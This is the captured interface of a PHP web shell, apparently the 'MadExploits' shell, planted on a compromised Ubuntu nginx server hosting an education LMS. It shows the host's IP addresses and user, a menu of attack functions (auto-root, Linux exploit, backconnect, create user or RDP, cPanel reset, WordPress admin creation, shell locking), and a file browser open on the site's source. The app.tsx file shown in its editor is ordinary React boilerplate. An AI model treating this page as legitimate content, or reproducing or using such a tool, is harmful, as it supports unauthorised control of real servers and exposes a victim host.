Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
edu-lms /
app /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
components
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
containers
[ DIR ]
drwxr-xr-x
edusewa
[ DIR ]
drwxr-xr-x
helpers
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
service
[ DIR ]
drwxr-xr-x
styles
[ DIR ]
drwxr-xr-x
translations
[ DIR ]
drwxr-xr-x
types
[ DIR ]
drwxr-xr-x
utils
[ DIR ]
drwxr-xr-x
.htaccess
1.75
KB
-rw-r--r--
.nginx.conf
3.21
KB
-rw-r--r--
app.tsx
4.15
KB
-rw-r--r--
configureStore.ts
4.25
KB
-rw-r--r--
global-styles.ts
658
B
-rw-r--r--
globals.d.tsx
401
B
-rw-r--r--
i18n.ts
1.26
KB
-rw-r--r--
index.html
6.25
KB
-rw-r--r--
locales.ts
95
B
-rw-r--r--
reducers.ts
3.76
KB
-rw-r--r--
saga.tsx
2.72
KB
-rw-r--r--
utils.d.ts
74
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : app.tsx
/** * app.js * * This is the entry file for the application, only setup and boilerplate * code. */ import 'react-app-polyfill/ie11'; import 'react-app-polyfill/stable'; // Import all the third party stuff import * as React from 'react'; import * as ReactDOM from 'react-dom'; import { Provider } from 'react-redux'; import { ConnectedRouter } from 'connected-react-router'; // import FontFaceObserver from 'fontfaceobserver'; import history from 'utils/history'; import 'sanitize.css/sanitize.css'; import * as OfflinePluginRuntime from 'offline-plugin/runtime'; import { renderRoutes } from 'react-router-config'; import { routes } from 'config'; //CSS IMPORT import 'bootstrap/dist/css/bootstrap.min.css'; // import 'font-awesome/css/font-awesome.min.css'; import 'assets/css/fontawesome-all.min.css'; import 'assets/css/style.css'; import 'assets/css/responsive.css'; import 'assets/css/new.css'; import $ from 'jquery'; import Popper from 'popper.js'; import 'bootstrap/dist/js/bootstrap.js'; // Import Language Provider import LanguageProvider from 'containers/default/LanguageProvider'; import { transitions, positions, Provider as AlertProvider } from 'react-alert' import AlertTemplate from 'react-alert-template-basic' // Load the favicon and the .htaccess file import '!file-loader?name=[name].[ext]!./images/favicon.ico'; import 'file-loader?name=.htaccess!./.htaccess'; import { HelmetProvider } from 'react-helmet-async'; import configureStore from './configureStore'; // Import i18n messages import { translationMessages } from 'i18n'; import { Alert } from 'components' import LoadingView from './edusewa/components/LoadingView' // Observe loading of Open Sans (to remove open sans, remove the <link> tag in // the index.html file and this observer) // const openSansObserver = new FontFaceObserver('Open Sans', {}); // When Open Sans is loaded, add a font-family using Open Sans to the body // openSansObserver.load().then(() => { // document.body.classList.add('fontLoaded'); // }); // Create redux store with history const initialState = {}; const store = configureStore(initialState, history); const MOUNT_NODE = document.getElementById('app') as HTMLElement; // optional cofiguration const options = { // you can also just use 'bottom center' position: positions.TOP_CENTER, timeout: 5000, offset: '30px', // you can also just use 'scale' transition: transitions.SCALE } const ConnectedApp = (props: {messages: any}) => ( <Provider store={store}> <LanguageProvider messages={props.messages}> <AlertProvider template={AlertTemplate} {...options} > <ConnectedRouter history={history}> <HelmetProvider> <Alert></Alert> <React.Suspense fallback={<LoadingView />}> {renderRoutes(routes)} </React.Suspense> </HelmetProvider> </ConnectedRouter> </AlertProvider> </LanguageProvider> </Provider> ); const render = (messages: any) => { ReactDOM.render(<ConnectedApp messages={messages}/>, MOUNT_NODE); }; if(module.hot){ // Hot reloadable translation json files // modules.hot.accept does not accept dynamic dependencies, // have to be constants at compile-time module.hot.accept(['./i18n'], () => { ReactDOM.unmountComponentAtNode(MOUNT_NODE); render(translationMessages); }); } // Chunked polyfill for browsers without Intl support if(!(window as any).Intl){ new Promise(resolve => { resolve(import('intl')); }) .then(() => Promise.all([ import('intl/locale-data/jsonp/en.js'), import('intl/locale-data/jsonp/de.js'), ]), ) .then(() => render(translationMessages)) .catch(err => { throw err; }); } else{ render(translationMessages); } // Install ServiceWorker and AppCache in the end since // it's not most important operation and if main code fails, // we do not want it installed if(process.env.NODE_ENV === 'production'){ OfflinePluginRuntime.install(); }
Close